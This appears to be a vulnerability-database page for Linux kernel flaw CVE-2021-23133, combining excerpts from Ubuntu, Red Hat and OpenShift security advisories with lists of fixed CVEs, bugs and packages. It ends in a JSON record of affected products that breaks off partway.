ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609

Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9

. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem. Bugs fixed (https://bugzilla.redhat.com/):

2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)

  1. Solution:

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1509204 - dlm: Add ability to set SO_MARK on DLM sockets 1793880 - Unreliable RTC synchronization (11-minute mode) 1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10 1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity 1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free 1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() 1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value 1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c 1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure 1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers 1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers 1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers 1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict ' 1939341 - CNB: net: add inline function skb_csum_is_sctp 1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode 1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c 1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c 1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS 1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c 1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del 1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory 1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP 1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. 1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory 1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation 1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection 1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys 1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame 1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client 1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks 1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames 1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks 1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header 1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames 1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers 1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments 1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h 1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs 1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails 1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls 1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier 1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl() 1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c 1971101 - ceph: potential data corruption in cephfs write_begin codepath 1972278 - libceph: allow addrvecs with a single NONE/blank address 1974627 - [TIPC] kernel BUG at lib/list_debug.c:31! 1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0] 1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c 1976679 - blk-mq: fix/improve io scheduler batching dispatch 1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00 1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116) 1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame 1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel 1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level 1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature 1978369 - dm writecache: sync with upstream 5.14 1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?) 1979680 - Backport openvswitch tracepoints 1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod 1986138 - Lockd invalid cast to nlm_lockowner 1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty() 1989999 - ceph omnibus backport for RHEL-8.5.0 1991976 - block: fix New warning in nvme_setup_discard 1992700 - blk-mq: fix kernel panic when iterating over flush request 1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files 1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-348.el8.src.rpm

aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm

ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm

x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert FluentdNodeDown always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-1571",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.232"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.114"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.189"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.32"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.11.16",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.32",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.114",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.189",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
